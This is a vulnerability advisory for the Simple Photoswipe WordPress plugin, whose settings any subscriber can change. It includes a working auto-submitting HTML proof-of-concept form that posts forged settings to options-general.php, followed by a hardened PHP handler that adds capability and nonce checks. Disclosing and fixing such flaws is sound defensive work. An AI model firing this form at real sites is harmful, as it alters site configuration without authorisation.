wpexploit / Caon / WPEX-ID:49B3A8CB-F606-4CF7-80EC-BFDAFD74E848
Jun 07, 2024 - 12:00 a.m.

Simple Photoswipe <= 0.1 - Subscriber+ Arbitrary Settings Update

AI Score: 6.6 Medium (Confidence: Low)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not perform an authorisation check when updating its settings, which could allow any authenticated user, such as a subscriber, to update them.

<html>
  <body>
    <form action="http://WP/wp-admin/options-general.php" method="POST">
      <input type="hidden" name="bar_size" value="anything" />
      <input type="hidden" name="indexIndicatorSep" value="anything" />
      <input type="hidden" name="loop_images" value="1" />
      <input type="hidden" name="show_close_element" value="1" />
      <input type="hidden" name="show_fullscreen_element" value="1" />
      <input type="hidden" name="show_zoom_element" value="1" />
      <input type="hidden" name="show_share_element" value="1" />
      <input type="hidden" name="show_counter_element" value="1" />
      <input type="hidden" name="show_arrow_element" value="1" />
      <input type="hidden" name="show_preloader_element" value="1" />
      <input type="hidden" name="tap_to_toggle_controls" value="1" />
      <input type="hidden" name="photoswipe_save" value="Save Settings" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


The response to the request above is 403, but the settings update still happens.
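
One way to close the gap described above, as an added example that is not the plugin's own code: a settings-save handler that checks capability and nonce before writing anything. It assumes the save runs on admin_init, which fires before options-general.php performs its own capability check and would explain a 403 response with the update still applied; the function, option and nonce names are hypothetical.

```php
<?php
// Added example, not the plugin's code. Hypothetical names: the function
// simple_photoswipe_save_settings(), the option 'simple_photoswipe_options',
// and the nonce action/field. POST field names are those in the form above.
//
// Assumed unsafe pattern: the handler runs on admin_init, which fires before
// options-general.php rejects the subscriber with 403, and it checks nothing:
//   add_action( 'admin_init', function () {
//       if ( isset( $_POST['photoswipe_save'] ) ) {
//           update_option( 'simple_photoswipe_options', $_POST );
//       }
//   } );

// Hardened handler: authorise and validate before any write.
add_action( 'admin_init', 'simple_photoswipe_save_settings' );

function simple_photoswipe_save_settings() {
    if ( ! isset( $_POST['photoswipe_save'] ) ) {
        return; // Not a settings save.
    }
    // Authorisation: only users allowed to manage site options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', 'Forbidden', array( 'response' => 403 ) );
    }
    // The request must carry the nonce issued by the settings form
    // (check_admin_referer() ends the request itself on failure).
    check_admin_referer( 'simple_photoswipe_save', 'simple_photoswipe_nonce' );

    $text_fields = array( 'bar_size', 'indexIndicatorSep' );
    $flag_fields = array(
        'loop_images', 'show_close_element', 'show_fullscreen_element',
        'show_zoom_element', 'show_share_element', 'show_counter_element',
        'show_arrow_element', 'show_preloader_element', 'tap_to_toggle_controls',
    );
    $options = array();
    foreach ( $text_fields as $key ) {
        $options[ $key ] = isset( $_POST[ $key ] )
            ? sanitize_text_field( wp_unslash( $_POST[ $key ] ) )
            : '';
    }
    foreach ( $flag_fields as $key ) {
        // On/off flags are stored strictly as 0 or 1.
        $options[ $key ] = ( isset( $_POST[ $key ] ) && '1' === $_POST[ $key ] ) ? 1 : 0;
    }
    update_option( 'simple_photoswipe_options', $options );
}

// The settings form must emit the matching field:
//   wp_nonce_field( 'simple_photoswipe_save', 'simple_photoswipe_nonce' );
```

With the checks placed inside the handler itself, the 403 is issued before update_option() runs, so the rejected request no longer changes stored settings.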
